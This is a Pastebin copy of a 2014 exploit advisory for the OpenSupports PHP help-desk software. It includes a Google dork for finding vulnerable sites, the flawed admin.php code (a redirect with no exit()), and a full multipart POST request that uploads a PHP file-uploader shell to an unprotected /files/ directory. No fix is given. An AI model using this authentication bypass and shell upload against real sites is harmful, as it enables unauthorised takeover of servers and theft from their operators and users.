Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Full title OpenSupports Remote Shell Upload Vulnerability
- Date add 2014-03-02
- Category web applications
- Platform php
- Risk <font color="#FFBF00">Security Risk High</font>
- Description Sites powered by OpenSupports suffer from a remote shell upload vulnerability.
- ==========================================
- # Exploit Title: Open Support Arbitrary Remote File Upload Vulnerabilities
- # Google Dork: allintext: "Power by OpenSupports © 2009 - 2014. All
- Rights reserved"
- # Date: 02,March 02,2014
- # Exploit Author: Slotleet
- # Vendor Homepage: http://www.opensupports.com/
- # Software Link: http://www.opensupports.com/download.html
- # Version: v2
- # Tested on: Win,Linux
- # Greet'z : I-HMX <3
- ==========================
- Vulnerability Description
- ==========================
- The Open Supports is prone to Arbitrary Remote File Upload.
- ==========================
- PoC-Exploit
- ==========================
- // Remote File Upload in /admin/admin.php
- session_start();
- require "config.php";
- if(isset($_POST[adminuser]))
- {
- if($_POST[adminuser] != $adminuser)
- {
- header('Location: error.php');
- }
- elseif($_POST[adminpass] != $adminpass)
- {
- header('Location: error.php');
- }
- else
- {
- $_SESSION[login] = true;
- }
- }
- elseif($_SESSION[login] != true)
- {
- header('Location: index.php');
- }
- In the first file we saw conditions if the admin logged in if not
- (Redirect the visitor to error.php), the problem here is the coder
- didn't set after redirect exit(); to make it die.
- so easly we can bypass the file by POST header :)
- Poc :
- POST : http://localhost/demo/admin/admin.php
- Host: localhost
- User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-gb,en;q=0.5
- Accept-Encoding: gzip, deflate
- Connection: keep-alive
- Referer: http://localhost/demo/admin/admin.php?id=articulo
- Content-Type: multipart/form-data;
- boundary=---------------------------168279961491
- Content-Length: 1398
- POST DATA :
- -----------------------------168279961491\r\n
- Content-Disposition: form-data; name="asunto"\r\n
- \r\n
- qwdqwdqwdqwdqwdqwdqwd\r\n
- -----------------------------168279961491\r\n
- Content-Disposition: form-data; name="text_content"\r\n
- \r\n
- qwdqwdqwdqwd\r\n
- -----------------------------168279961491\r\n
- Content-Disposition: form-data; name="fileuploader"; filename="up.php"\r\n
- Content-Type: application/octet-stream\r\n
- \r\n
- <style type="text/css">\n
- body {\n
- color: #33ff33;\n
- background-color: black;\n
- font-weight: inherit;\n
- }\n
- h1,h2{\n
- background-color: #4D4D4D;\n
- color: #000000;\n
- text-align: center;\n
- }\n
- h3,h4,h5{\n
- color: silver;\n
- text-align: center;\n
- }\n
- </style>\n
- <b><br>\n
- <h1> Uploading </h1>\n
- <br><br>\n
- <center>\n
- <font color:"blue">\n
- <span style="font-family: monospace;">\n
- <span style="color: rgb(255, 255, 255);">\n
- <br><br>\n
- <font color="black"></font>\n
- <br></b> <?php\n
- echo '<form action="" method="post" enctype="multipart/form-data"
- name="uploader" id="uploader">';\n
- echo '<input type="file" name="file" size="50">\n
- <input name="_upl" type="submit" id="_upl" value="Upload">\n
- </form>'; if( $_POST['_upl'] == "Upload" ) {
- if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']))\n
- {\n
- echo '<b>Archivo subido!</b><br><br>';\n
- }\n
- else\n
- {\n
- echo '<b>Upload Fail!</b><br><br></font>';\n
- }\n
- }\n
- \n
- ?>\n
- \r\n
- -----------------------------168279961491\r\n
- Content-Disposition: form-data; name="Submit22"\r\n
- \r\n
- Publish Article\r\n
- -----------------------------168279961491--\r\n
- Automaticly the file is uploaded to /files/, and the coder didn't
- create index.html or .htaccess to make visitor can't gain access to
- this folder.
- The POST Data will be executed in browser (Maybe You'll see Error, but
- the post executed just go to /files/ and you'll see such like
- 117310_up.php)
- ==========================
- Solution
- ==========================
- Not Available.
- ==========================
- Credits
- ==========================
- Vulnerabilities found and advisory written by Slotleet.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement